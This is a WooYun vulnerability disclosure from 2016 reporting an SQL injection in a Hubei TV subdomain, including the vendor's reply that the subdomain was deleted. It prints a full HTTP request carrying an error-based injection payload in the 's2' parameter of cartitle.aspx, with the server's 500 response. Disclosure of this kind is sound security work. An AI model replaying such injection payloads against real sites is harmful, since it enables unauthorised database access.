漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0179741
漏洞标题:湖北卫视 sql
相关厂商:湖北电视台
漏洞作者: H.U.C-人 族
提交时间:2016-03-01 11:38
修复时间:2016-03-01 17:02
公开时间:2016-03-01 17:02
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:厂商已经修复
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-03-01: 细节已通知厂商并且等待厂商处理中
2016-03-01: 厂商已经确认,细节仅向厂商公开
2016-03-01: 厂商已经修复漏洞并主动公开,细节向公众公开
简要描述:
详细说明:
GET /cartitle.aspx?s2=convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(81)%2bCHAR(85)%2bCHAR(115)%2bCHAR(51)%2bCHAR(71)%2bCHAR(119)%2bCHAR(118)%2bCHAR(122)) HTTP/1.1
Cookie: ASP.NET_SessionId=jpuc4d1hbhfvybkbvhg3h2dz; CNZZDATA1350473=cnzz_eid%3D621333911-1456796714-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1456796714
Host: car.hbtv.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Response
HTTP/1.1 500 Internal Server Error
Date: Tue, 01 Mar 2016 01:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6403
漏洞证明:
修复方案:
看着办
版权声明:转载请注明来源 H.U.C-人 族@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:5
确认时间:2016-03-01 16:41
厂商回复:
谢谢贵帽对我司的关注,该二级域名为第三方厂商合作临时所用,该合作未正式启动,已经将该二级域名删除。
最新状态:
2016-03-01:该二级域名为第三方厂商合作临时所用,该合作未正式启动,已经将该二级域名删除。